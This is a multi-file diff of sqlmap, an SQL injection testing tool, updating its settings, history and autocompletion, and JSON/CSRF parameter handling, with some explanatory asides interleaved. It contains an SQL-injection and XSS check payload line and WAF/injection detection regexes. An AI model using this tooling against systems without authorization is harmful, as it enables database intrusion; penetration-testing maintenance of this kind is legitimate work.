 REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
 BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
+SAFE_VARIABLE_MARKER = "__SAFE__"

 RANDOM_INTEGER_MARKER = "[RANDINT]"
 RANDOM_STRING_MARKER = "[RANDSTR]"
 SLEEP_TIME_MARKER = "[SLEEPTIME]"
+INFERENCE_MARKER = "[INFERENCE]"

 PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
 CHAR_INFERENCE_MARK = "%c"
 PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"

 # Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
-SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"
+SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P<result>([\w.]|`[^`<>]+`)+)"

 # Regular expression used for recognition of textual content-type
 TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"

 # Regular expression used for recognition of generic permission messages
-PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
+PERMISSION_DENIED_REGEX = r"(?P<result>(command|permission|access)\s*(was|is)?\s*denied)"
+
+# Regular expression used in recognition of generic protection mechanisms
+GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"

 # Regular expression used for recognition of generic maximum connection messages
-MAX_CONNECTIONS_REGEX = r"max.+connections"
+MAX_CONNECTIONS_REGEX = r"\bmax.+?\bconnection"

 # Maximum consecutive connection errors before asking the user if he wants to continue
 MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
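Among the additions in the hunk above, GENERIC_PROTECTION_REGEX gives sqlmap a generic pattern for spotting WAF/IPS style responses. An illustrative check of how such a constant is applied to a response body (this snippet is not sqlmap's detection code):

import re

GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"
page = "Your request has been blocked by the web application firewall"
print(bool(re.search(GENERIC_PROTECTION_REGEX, page)))  # True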
@@ -99,8 +106,8 @@ GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\
 # Regular expression used for extracting results from DuckDuckGo search
 DUCKDUCKGO_REGEX = r'"u":"([^"]+)'

-# Regular expression used for extracting results from Disconnect Search
-DISCONNECT_SEARCH_REGEX = r'<p class="url wrapword">([^<]+)</p>'
+# Regular expression used for extracting results from Bing search
+BING_REGEX = r'<h2><a href="([^"]+)" h='

 # Dummy user agent for search (if default one returns different results)
 DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
@@ -175,6 +182,9 @@ INFERENCE_UNKNOWN_CHAR = '?'
 # Character used for operation "greater" in inference
 INFERENCE_GREATER_CHAR = ">"

+# Character used for operation "greater or equal" in inference
+INFERENCE_GREATER_EQUALS_CHAR = ">="
+
 # Character used for operation "equals" in inference
 INFERENCE_EQUALS_CHAR = "="

@@ -187,8 +197,8 @@ UNKNOWN_DBMS = "Unknown"
 # String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"

-# Dynamicity mark length used in dynamicity removal engine
-DYNAMICITY_MARK_LENGTH = 32
+# Dynamicity boundary length used in dynamicity removal engine
+DYNAMICITY_BOUNDARY_LENGTH = 20

 # Dummy user prefix used in dictionary attack
 DUMMY_USER_PREFIX = "__dummy__"
@@ -196,6 +206,11 @@ DUMMY_USER_PREFIX = "__dummy__"
 # Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
 DEFAULT_PAGE_ENCODING = "iso-8859-1"

+try:
+    unicode(DEFAULT_PAGE_ENCODING, DEFAULT_PAGE_ENCODING)
+except LookupError:
+    DEFAULT_PAGE_ENCODING = "utf8"
+
 # URL used in dummy runs
 DUMMY_URL = "http://foo/bar?id=1"

@@ -210,7 +225,7 @@ PYVERSION = sys.version.split()[0]
 MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
 MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
 PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
-ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
+ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL')
 SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
 ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
 FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
@@ -285,6 +300,10 @@ BASIC_HELP_ITEMS = (
     "wizard",
 )

+# Tags used for value replacements inside shell scripts
+SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
+SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
+
 # String representation for NULL value
 NULL = "NULL"

@@ -294,13 +313,16 @@ BLANK = "<blank>"
 # String representation for current database
 CURRENT_DB = "CD"

+# Name of SQLite file used for storing session data
+SESSION_SQLITE_FILE = "session.sqlite"
+
 # Regular expressions used for finding file paths in error messages
-FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
+FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")

 # Regular expressions used for parsing error messages (--parse-errors)
 ERROR_PARSING_REGEXES = (
     r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
-    r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
+    r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
     r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
     r"<li>Error Type:<br>(?P<result>.+?)</li>",
     r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
@@ -342,10 +364,10 @@ URI_HTTP_HEADER = "URI"
 URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"

 # Regex used for masking sensitive data
-SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
+SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"

 # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
-SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
+SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")

 # Maximum number of threads (avoiding connection issues and/or DoS)
 MAX_NUMBER_OF_THREADS = 10
@@ -366,7 +388,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
 CUSTOM_INJECTION_MARK_CHAR = '*'

 # Other way to declare injection position
-INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
+INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%"

 # Minimum chunk length used for retrieving data over error based payloads
 MIN_ERROR_CHUNK_LENGTH = 8
@@ -407,6 +429,9 @@ HASH_MOD_ITEM_DISPLAY = 11
 # Maximum integer value
 MAX_INT = sys.maxint

+# Replacement for unsafe characters in dump table filenames
+UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'
+
 # Options that need to be restored in multiple targets run mode
 RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")

@@ -462,7 +487,7 @@ LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual c
 REFLECTIVE_MISS_THRESHOLD = 20

 # Regular expression used for extracting HTML title
-HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
+HTML_TITLE_REGEX = r"<title>(?P<result>[^<]+)</title>"

 # Table used for Base64 conversion in WordPress hash cracking routine
 ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
@@ -473,7 +498,7 @@ PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, t
 DUMMY_SQL_INJECTION_CHARS = ";()'"

 # Simple check against dummy users
-DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
+DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY|FLOOR\(RAND)\b"

 # Extensions skipped by crawler
 CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
@@ -494,7 +519,7 @@ IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")
 SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

 # Generic address for checking the Internet connection while using switch --check-internet
-CHECK_INTERNET_ADDRESS = "http://ipinfo.io/"
+CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"

 # Value to look for in response to CHECK_INTERNET_ADDRESS
 CHECK_INTERNET_VALUE = "IP Address Details"
@@ -514,6 +539,9 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
 BIGARRAY_CHUNK_SIZE = 1024 * 1024

+# Compress level used for storing BigArray chunks to disk (0-9)
+BIGARRAY_COMPRESS_LEVEL = 9
+
 # Maximum number of socket pre-connects
 SOCKET_PRE_CONNECT_QUEUE_SIZE = 3

@@ -570,7 +598,7 @@ HASHDB_RETRIEVE_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3

 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
+HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'

 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -591,7 +619,7 @@ MAX_TOTAL_REDIRECTIONS = 10
 MAX_DNS_LABEL = 63

 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
-DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
+DNS_BOUNDARIES_ALPHABET = re.sub(r"[a-fA-F]", "", string.ascii_letters)

 # Alphabet used for heuristic checks
 HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
@@ -603,7 +631,7 @@ BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample
 DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"

 # Regular expression used for recognition of file inclusion errors
-FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
+FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"

 # Length of prefix and suffix used in non-SQLI heuristic checks
 NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
@@ -612,7 +640,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024

 # Maximum response total page size (trimmed if larger)
-MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
+MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024

 # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
 MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -633,7 +661,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10

 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response")
+BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported")

 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -672,7 +700,7 @@ INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
 XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"

 # Regular expression used for detecting JSON POST data
-JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
+JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'

 # Regular expression used for detecting JSON-like POST data
 JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
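The widened JSON_RECOGNITION_REGEX above now also accepts empty strings and bare true/false/null values, so JSON POST bodies that contain no quoted or numeric value are still recognized. A quick illustrative check:

import re

JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'
print(bool(re.search(JSON_RECOGNITION_REGEX, '{"admin": false}')))  # True (the previous pattern missed this body)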
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import atexit
@@ -60,6 +60,8 @@ def saveHistory(completion=None):
         historyPath = paths.SQL_SHELL_HISTORY
     elif completion == AUTOCOMPLETE_TYPE.OS:
         historyPath = paths.OS_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.API:
+        historyPath = paths.API_SHELL_HISTORY
     else:
         historyPath = paths.SQLMAP_SHELL_HISTORY

@@ -86,6 +88,8 @@ def loadHistory(completion=None):
         historyPath = paths.SQL_SHELL_HISTORY
     elif completion == AUTOCOMPLETE_TYPE.OS:
         historyPath = paths.OS_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.API:
+        historyPath = paths.API_SHELL_HISTORY
     else:
         historyPath = paths.SQLMAP_SHELL_HISTORY

@@ -104,20 +108,20 @@ def autoCompletion(completion=None, os=None, commands=None):
         if os == OS.WINDOWS:
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
                 "copy": None, "del": None, "dir": None,
                 "echo": None, "md": None, "mem": None,
                 "move": None, "net": None, "netstat -na": None,
                 "ver": None, "xcopy": None, "whoami": None,
             })

         else:
             # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
             completer = CompleterNG({
                 "cp": None, "rm": None, "ls": None,
                 "echo": None, "mkdir": None, "free": None,
                 "mv": None, "ifconfig": None, "netstat -natu": None,
                 "pwd": None, "uname": None, "id": None,
             })

         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
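For context on the autoCompletion() hunk above: the CompleterNG object is plugged into the interpreter through the standard readline hooks shown at the bottom of the hunk. A generic, self-contained sketch of that wiring with plain readline (not sqlmap's CompleterNG class):

import readline

COMMANDS = ("ls", "pwd", "id", "uname", "ifconfig")

def complete(text, state):
    # readline calls this repeatedly with state = 0, 1, 2, ... until None is returned
    matches = [command for command in COMMANDS if command.startswith(text)]
    return matches[state] if state < len(matches) else None

readline.set_completer(complete)
readline.parse_and_bind("tab: complete")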
@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import errno
 import os
 import subprocess
-import sys
 import time

 from lib.core.settings import IS_WIN
@@ -24,11 +23,6 @@ else:
     import select
     import fcntl

-    if (sys.hexversion >> 16) >= 0x202:
-        FCNTL = fcntl
-    else:
-        import FCNTL
-
 def blockingReadFromFD(fd):
     # Quick twist around original Twisted function
     # Blocking read from a non-blocking file descriptor
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import codecs
@@ -62,6 +62,7 @@ from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import RESTORE_MERGED_OPTIONS
 from lib.core.settings import RESULTS_FILE_FORMAT
+from lib.core.settings import SESSION_SQLITE_FILE
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import UNENCODED_ORIGINAL_VALUE
 from lib.core.settings import UNICODE_ENCODING
@@ -82,6 +83,7 @@ def _setRequestParams():
 conf.parameters[None] = "direct connection"
 return

+hintNames = []
 testableParameters = False

 # Perform checks on GET parameters
@@ -100,7 +102,6 @@ def _setRequestParams():

 if conf.data is not None:
 conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
-hintNames = []

 def process(match, repl):
 retVal = match.group(0)
@@ -141,13 +142,14 @@ def _setRequestParams():
 if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
 conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
 conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
-conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
+conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
-conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data)
+conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
+conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
 match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
 if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
 _ = match.group(2)
-_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
+_ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _)
-_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
+_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _)
 conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))

 kb.postHint = POST_HINT.JSON
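Note: the regular expressions above append the custom injection mark after JSON string, numeric and (newly) boolean/null values so that each field of a JSON POST body becomes a testable parameter. A simplified, self-contained sketch of that marking step (using a plain '*' mark and direct replacement strings instead of sqlmap's process()/functools.partial callback):

    import re

    MARK = "*"
    data = '{"id": 1, "name": "john", "admin": false}'

    # string values: {"name": "john"} -> {"name": "john*"}
    data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', r'\g<1>%s"' % MARK, data)
    # numeric values: {"id": 1} -> {"id": 1*}
    data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', r'\g<1>\g<3>%s' % MARK, data)
    # boolean/null values: {"admin": false} -> {"admin": false*}
    data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', r'\g<1>\g<3>%s' % MARK, data)

    print(data)  # {"id": 1*, "name": "john*", "admin": false*}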
@@ -228,9 +230,9 @@ def _setRequestParams():
 if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
 conf.parameters[PLACE.POST] = conf.data

-kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
+kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks

-if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
+if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
 warnMsg = "you've provided target URL without any GET "
 warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
 warnMsg += "and without providing any POST parameters "
@@ -375,7 +377,7 @@ def _setRequestParams():
 if condition:
 conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
 conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
-conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
+conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
 testableParameters = True

 if not conf.parameters:
@@ -389,12 +391,15 @@ def _setRequestParams():
 raise SqlmapGenericException(errMsg)

 if conf.csrfToken:
-if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
+if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
 errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
 errMsg += "found in provided GET, POST, Cookie or header values"
 raise SqlmapGenericException(errMsg)
 else:
 for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+if conf.csrfToken:
+break

 for parameter in conf.paramDict.get(place, {}):
 if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
 message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
@@ -402,7 +407,7 @@ def _setRequestParams():

 if readInput(message, default='N', boolean=True):
 conf.csrfToken = getUnicode(parameter)
 break

 def _setHashDB():
 """
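Note: the CSRF handling above falls back to a name-based heuristic when no --csrf-token value matches the request: any parameter whose name contains a known infix is offered as the anti-CSRF token. A rough standalone sketch of that matching step (the infix tuple below is an example, not sqlmap's exact CSRF_TOKEN_PARAMETER_INFIXES value):

    CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")

    def looks_like_csrf_token(parameter):
        # True when any known infix appears in the lower-cased parameter name
        return any(infix in parameter.lower() for infix in CSRF_TOKEN_PARAMETER_INFIXES)

    for place, parameters in (("GET", ["id", "csrf_token"]), ("POST", ["user"])):
        for parameter in parameters:
            if looks_like_csrf_token(parameter):
                print("%s parameter '%s' appears to hold anti-CSRF token" % (place, parameter))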
@@ -410,7 +415,7 @@ def _setHashDB():
 """

 if not conf.hashDBFile:
-conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
